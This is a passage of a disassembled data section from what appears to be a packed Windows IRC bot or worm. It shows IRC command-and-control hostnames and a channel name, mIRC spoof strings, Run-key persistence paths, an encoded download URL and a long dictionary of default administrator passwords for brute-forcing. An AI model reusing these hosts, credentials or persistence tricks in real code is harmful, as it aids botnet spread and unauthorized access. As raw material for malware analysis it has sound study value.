dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_427638 dd 2Eh ; DATA XREF: sub_401ACD+347D�o
; sub_401ACD+356D�o ...
dword_42763C dd 2Eh ; DATA XREF: sub_401ACD+389D�o
; sub_401ACD+38D3�o ...
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40D21F+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_427680 dq 1.388888888888889e-2 ; DATA XREF: sub_40D031+2F�r
dbl_427688 dq 1.666666666666667e-1 ; DATA XREF: sub_40D031+15�r
dword_427690 dd 0FFFFFFFFh ; DATA XREF: sub_40D07D+16F�r
; sub_40D4B1�r ...
align 8
dbl_427698 dq 1.333333333333333 ; DATA XREF: sub_40D07D+79�r
dword_4276A0 dd 0 ; DATA XREF: sub_40D21F+4D�o
; sub_40D561+5B�o ...
flt_4276A4 dd 5.0e-1 ; DATA XREF: sub_40D99C+398�r
dbl_4276A8 dq 9.765625e-4 ; DATA XREF: sub_4163FA+2BD�r
; sub_4163FA+2D8�r ...
dbl_4276B0 dq -1.52587890625e-4 ; DATA XREF: sub_417ADE+3E5�r
dbl_4276B8 dq 3.0517578125e-4 ; DATA XREF: sub_417ADE+3C5�r
dbl_4276C0 dq -3.0517578125e-4 ; DATA XREF: sub_417ADE+342�r
; sub_417ADE+3A7�r
dbl_4276C8 dq 1.52587890625e-4 ; DATA XREF: sub_417ADE+271�r
dbl_4276D0 dq -1.739501953125e-3 ; DATA XREF: sub_417ADE+24B�r
; sub_417ADE+2D5�r ...
dbl_4276D8 dq 3.11279296875e-3 ; DATA XREF: sub_417ADE+E1�r
dbl_4276E0 dq 3.0517578125e-5 ; DATA XREF: sub_417ADE+AE�r
; sub_417ADE+138�r ...
dbl_4276E8 dq 6.103515625e-5 ; DATA XREF: sub_417ADE+93�r
; sub_417ADE+308�r
dbl_4276F0 dq 2.288818359375e-3 ; DATA XREF: sub_417ADE+21�r
dbl_4276F8 dq -3.0517578125e-5 ; DATA XREF: sub_418685+2B�r
flt_427700 dd 9.765625e-4 ; DATA XREF: sub_41A4D2+1B0�r
flt_427704 dd 8.0 ; DATA XREF: sub_41A4D2+1AA�r
flt_427708 dd 0.0 ; DATA XREF: sub_41A4D2+171�r
flt_42770C dd 1.0e-3 ; DATA XREF: sub_41A4D2+168�r
dbl_427710 dq 1.0 ; DATA XREF: sub_41C679+6C�r
; sub_41C7BF+6C�r ...
dword_427718 dd 0FFFFFFFFh, 41DA0Ah, 41DA1Eh ; DATA XREF: UPX0:0041D938�o
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41DC8A+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41DC8A+4F�o
align 4
byte_427754 db 6 ; DATA XREF: sub_41F69F:loc_41F6F6�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: UPX0:off_43CBF4�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: UPX0:off_43CBF0�o
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: UPX0:off_43CE6C�o
dbl_427878 dq 0.0 ; DATA XREF: sub_42135F+8C�r
; sub_42135F+AC�r ...
dbl_427880 dq 4.195835e6 ; DATA XREF: sub_421874+F�r
dbl_427888 dq 3.145727e6 ; DATA XREF: sub_421874+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4218B2+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4218B2�o
align 4
aE000 db 'e+000',0 ; DATA XREF: sub_4219D9+93�o
align 10h
dword_4278C0 dd 0FFFFFFFFh, 4220C4h, 4220CEh, 0 ; DATA XREF: sub_42205D+5�o
dword_4278D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42218C+5�o
dd offset loc_42224A
align 10h
dd offset sub_422228
dd offset sub_422232
dword_4278E8 dd 0FFFFFFFFh, 42247Ah, 42247Eh, 0 ; DATA XREF: sub_4222C2+5�o
dword_4278F8 dd 0FFFFFFFFh, 4224DCh, 4224E5h, 0 ; DATA XREF: sub_422486+5�o
dword_427908 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42255C+5�o
dd offset loc_4225AD
align 8
dd offset loc_422599
dd offset loc_42259D
dword_427920 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4225B2+5�o
dd offset loc_422603
align 10h
dd offset loc_4225EF
dd offset loc_4225F3
dword_427938 dd 2 dup(0) ; DATA XREF: sub_422ACA+36�o
; sub_423CEC+39�o ...
dword_427940 dd 0FFFFFFFFh, 422BDAh, 422BDEh, 0FFFFFFFFh, 422C8Eh, 422C92h
; DATA XREF: sub_422ACA+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: UPX0:off_43D03C�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4235C9+119�o
align 4
asc_427C08 db 0Ah ; DATA XREF: sub_4235C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4235C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4235C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4235C9+7D�o
align 8
dword_427C48 dd 0FFFFFFFFh, 423DE5h, 423DE9h ; DATA XREF: sub_423CEC+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_4247EC+A�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_424D78+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_424D78+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_424D78+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_4256C2:loc_4257B7�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_4256C2+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_4256C2+C7�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_4256C2+AD�o
align 4
dword_427CE8 dd 0FFFFFFFFh, 4260BAh, 4260BEh, 0FFFFFFFFh, 426129h, 42612Dh
; DATA XREF: sub_425F03+5�o
dd 427E24h
off_427D04 dd offset loc_4264E2 ; DATA XREF: sub_4264BA+8�o
; sub_4264FE+2C�o ...
dd offset sub_4264D5
dd offset sub_4266F6
dd offset dword_427E70
off_427D14 dd offset sub_42654C ; DATA XREF: sub_4264FE+3A�o
; sub_426568�o ...
dd offset sub_4264D5
dd offset loc_426732
dword_427D20 dd 0 ; DATA XREF: sub_4264FE+16�o
; sub_4265D0+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_426573+11�o
dd offset dword_427EBC
off_427D40 dd offset sub_42665B ; DATA XREF: sub_426677�o
; sub_42669A+37�o ...
dd offset sub_4264D5
dd offset loc_426714
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42669A+11�o
dd offset dword_427F00
off_427D60 dd offset loc_4267F7 ; DATA XREF: sub_4267E2�o
; UPX0:off_43D764�o ...
dd offset dword_427F30
off_427D68 dd offset loc_426813 ; DATA XREF: sub_42682F+8�o
; sub_42686C+8�o ...
dd offset sub_4268CC
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_4268CC+7�o
align 8
dword_427D88 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4268D9+E�o
dd 3, 19930520h, 2 dup(0)
dword_427DA8 dd 0FFFFFFFFh, 426A8Ah, 426A8Eh, 0FFFFFFFFh, 426B07h, 426B0Bh
; DATA XREF: sub_426988+5�o
dword_427DC0 dd 0FFFFFFFFh, 426CFFh, 426D03h, 0FFFFFFFFh, 426D5Ch, 426D60h
; DATA XREF: sub_426C13+5�o
dd 43D764h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_427DF0 dd offset off_43D77C ; DATA XREF: UPX0:00427E08�o
; UPX0:00427E54�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427DF0
dd offset dword_427DC0+18h
dword_427E10 dd 3 dup(0) ; DATA XREF: UPX0:00427E34�o
dd 2, 427E08h, 3 dup(0)
dd offset off_43D77C
dd offset dword_427E10+4
off_427E38 dd offset off_43D79C ; DATA XREF: UPX0:00427E50�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E38
dd offset off_427DF0
dd offset dword_427DC0+18h
dword_427E5C dd 3 dup(0) ; DATA XREF: UPX0:00427E80�o
dd 3, 427E50h
dword_427E70 dd 3 dup(0) ; DATA XREF: UPX0:00427D10�o
dd offset off_43D79C
dd offset dword_427E5C+4
off_427E84 dd offset off_43D7BC ; DATA XREF: UPX0:00427E9C�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E84
dd offset off_427DF0
dd offset dword_427DC0+18h
dword_427EA8 dd 3 dup(0) ; DATA XREF: UPX0:00427ECC�o
dd 3, 427E9Ch
dword_427EBC dd 3 dup(0) ; DATA XREF: UPX0:00427D3C�o
dd offset off_43D7BC
dd offset dword_427EA8+4
off_427ED0 dd offset off_43D7E0 ; DATA XREF: UPX0:00427EE8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427ED0
dword_427EEC dd 3 dup(0) ; DATA XREF: UPX0:00427F10�o
dd 1, 427EE8h
dword_427F00 dd 3 dup(0) ; DATA XREF: UPX0:00427D5C�o
dd offset off_43D7E0
dd offset dword_427EEC+4
dd offset dword_427DC0+18h
dword_427F18 dd 4 dup(0) ; DATA XREF: UPX0:00427F40�o
dd 1, 427F14h
dword_427F30 dd 3 dup(0) ; DATA XREF: UPX0:00427D64�o
dd offset off_43D764
dd offset dword_427F18+8
align 8
dword_427F48 dd 19930520h, 2, 427F68h, 5 dup(0) ; DATA XREF: UPX0:loc_426DF7�o
dd 0FFFFFFFFh, 426DE0h, 0
dd offset sub_426DD8
dword_427F78 dd 19930520h, 2, 427F98h, 5 dup(0) ; DATA XREF: UPX0:loc_426E14�o
dd 0FFFFFFFFh, 426E04h, 0
dd offset loc_426E0C
dword_427FA8 dd 19930520h, 2, 427FC8h, 1, 427FD8h, 3 dup(0) ; DATA XREF: UPX0:loc_426E20�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 427FF0h, 4 dup(0)
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0D7h, 40h, 0
dd 0FFFFFFFFh, 426E2Ah
dword_428008 dd 19930520h, 1, 428000h, 5 dup(0) ; DATA XREF: UPX0:loc_426E32�o
dd offset off_43D764
align 10h
dd 0FFFFFFFFh, 0
dd 0Ch, 42686Ch, 0
dd offset off_43D77C
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 426618h, 0
dd offset off_43D79C
align 8
dd 0FFFFFFFFh, 0
dword_428070 dd 1Ch, 426682h, 3, 42805Ch, 428040h, 428024h ; DATA XREF: UPX0:00428094�o
dword_428088 dd 0 ; DATA XREF: sub_426573+2E�o
; sub_4266F6+4B�o
dd offset sub_426568
dd 0
dd offset dword_428070+8
dd 0FFFFFFFFh, 426E3Ch
dword_4280A0 dd 19930520h, 1, 428098h, 4 dup(0) ; DATA XREF: UPX0:loc_426E44�o
dd 0FFFFFFFFh, 426E4Eh
dword_4280C4 dd 19930520h, 1, 4280BCh, 4 dup(0) ; DATA XREF: UPX0:loc_426E56�o
dd 0FFFFFFFFh, 426E60h
dword_4280E8 dd 19930520h, 1, 4280E0h, 5 dup(0) ; DATA XREF: UPX0:loc_426E68�o
dd offset off_43D7BC
align 10h
dd 0FFFFFFFFh, 0
dword_428118 dd 1Ch, 4266DEh, 3, 428104h, 428040h, 428024h ; DATA XREF: UPX0:0042813C�o
dword_428130 dd 0 ; DATA XREF: sub_42669A+2E�o
; sub_4266F6+2D�o
dd offset sub_426677
dd 0
dd offset dword_428118+8
dd 0FFFFFFFFh, 426E72h
dword_428148 dd 19930520h, 1, 428140h, 4 dup(0) ; DATA XREF: UPX0:loc_426E7A�o
dword_428164 dd 2, 428040h, 428024h ; DATA XREF: UPX0:0042817C�o
dword_428170 dd 0 ; DATA XREF: sub_4266F6+F�o
dd offset sub_4264BA
dd 0
dd offset dword_428164
dd 3A0h dup(0)
dword_429000 dd 0 ; DATA XREF: sub_41B784+1F�o
dd offset loc_401205
dd offset sub_40D879
dd offset sub_40D89B
dd offset sub_40E6D4
dword_429014 dd 0 ; DATA XREF: sub_41B784+1A�o
dword_429018 dd 0 ; DATA XREF: sub_41B784+10�o
dd offset sub_41D052
dd offset sub_42026D
dd offset sub_423936
dd offset sub_424752
dword_42902C dd 0 ; DATA XREF: sub_41B784:loc_41B78F�o
dword_429030 dd 0 ; DATA XREF: sub_41B7D3+65�o
dd offset sub_4239DB
dword_429038 dd 0 ; DATA XREF: sub_41B7D3:loc_41B833�o
dword_42903C dd 0 ; DATA XREF: sub_41B7D3+76�o
dd offset sub_424763
dword_429044 dd 3 dup(0) ; DATA XREF: sub_41B7D3:loc_41B844�o
dword_429050 dd 80000002h, 429178h, 80000002h, 4291A8h, 80000001h, 429178h
; DATA XREF: sub_401000+7�o
dword_429068 dd 6272h ; DATA XREF: sub_401000+63�o
; sub_4010AB+B�o ...
dword_42906C dd 1B58h ; DATA XREF: sub_401221+4A4�r
; sub_401221+539�r
dword_429070 dd 0C8Bh ; DATA XREF: sub_401221+585�r
dword_429074 dd 7E4h ; DATA XREF: sub_401ACD:loc_40461C�r
dword_429078 dd 45h ; DATA XREF: sub_401ACD+2089�r
; sub_40BACE+3B�r
dword_42907C dd 7D1h ; DATA XREF: sub_401ACD:loc_403C44�r
; sub_40BACE:loc_40BEBF�r
dword_429080 dd 201h ; DATA XREF: sub_401ACD:loc_403DD0�r
word_429084 dw 7C7h ; DATA XREF: sub_401ACD:loc_40473F�r
align 4
dword_429088 dd 1 ; DATA XREF: sub_401ACD+65F�r
dword_42908C dd 1 ; DATA XREF: sub_401221+13D�r
dword_429090 dd 1 ; DATA XREF: sub_401221:loc_401562�r
; sub_41835A+C�r
byte_429094 db 2Eh ; DATA XREF: sub_401ACD+A92�r
; sub_401ACD+B4C�r ...
align 4
dword_429098 dd 0Ah ; DATA XREF: sub_40ACB6+3A�r
; sub_40ACB6+60�r ...
dword_42909C dd 4 ; DATA XREF: sub_4017ED+78�r
; sub_401ACD+279�r ...
dword_4290A0 dd 1 ; DATA XREF: sub_4017ED+72�r
; sub_401ACD+273�r
aQufpoius db 'qufpoius',0 ; DATA XREF: sub_401221+5D�o
; sub_401ACD:loc_4044A1�o ...
align 10h
aAbosel7Vs db 'abosel7 vs',0 ; DATA XREF: sub_401ACD:loc_404946�o
align 4
aCool db 'cool',0 ; DATA XREF: sub_401ACD+7DDC�o
; sub_401ACD+7EAB�o
align 4
aSaber4_ircqfor db 'saber4.ircqforum.com',0 ; DATA XREF: sub_401221+490�o
; sub_401221+52A�o
align 4
aFaak db '#FAAK#',0 ; DATA XREF: sub_401221+4B0�o
; sub_401221+540�o ...
align 4
aSaad_ db 'saad.',0 ; DATA XREF: sub_401221+4C7�o
; sub_401221+552�o
align 4
byte_4290EC db 73h ; DATA XREF: sub_401221:loc_401789�r
; sub_401221+576�o
aCorti1_dns2go_ db 'corti1.dns2go.com',0
align 10h
aFaak_0 db '#FAAK#',0 ; DATA XREF: sub_401221+58C�o
align 4
aSaad__0 db 'saad.',0 ; DATA XREF: sub_401221+59E�o
align 10h
byte_429110 db 67h ; DATA XREF: sub_401221+143�o
; sub_401221+167�w ...
db 67h, 76h, 79h
dd 69767671h, 78652E68h, 65h
dword_429120 dd 6E646977h, 61622E74h, 74h ; DATA XREF: sub_411C14+3D�o
aWindsSerscAgts db 'Winds Sersc Agts',0 ; DATA XREF: sub_401000+E�o
align 10h
asc_429140: ; DATA XREF: UPX0:0040AD35�o
unicode 0, <->,0
aWinsys_dat db 'winsys.dat',0
align 10h
aXI db '-x+i',0 ; DATA XREF: sub_401ACD+7F27�o
align 4
aF db '#f',0 ; DATA XREF: sub_401ACD+1D46�o
; sub_401ACD+3040�o ...
align 4
aF_0 db '#f',0 ; DATA XREF: sub_401ACD+44A3�o
align 10h
aF_1 db '#f',0 ; DATA XREF: sub_401ACD+40C5�o
; sub_401ACD+4217�o
align 4
off_429164 dd offset a@admin_com ; DATA XREF: sub_401ACD:loc_4098FC�o
; "*@admin.com"
off_429168 dd offset aMircV6_16Khale ; DATA XREF: sub_401ACD+8C3�r
; sub_401ACD+7E4B�o
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 10h
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_419E7A+28�o
; sub_41A19E+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_419E7A+D4�o
; sub_41A19E+D4�o
align 10h
dd 2 dup(1), 70747468h, 772F2F3Ah, 662E7777h, 77656572h
dd 6F746265h, 632E6E77h, 7A2F6D6Fh, 2F737678h, 73636E76h
dd 652E6D79h, 6578h, 429940h, 429930h, 429920h, 429914h
dd 42990Ch, 429904h, 4298FCh, 4298F4h, 4298E8h, 4298E0h
dd 4298D8h, 4298D0h, 4298C4h, 4298BCh, 4298B4h, 4298A8h
dd 4298A4h, 42989Ch, 429898h, 0
dd offset byte_43D808
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
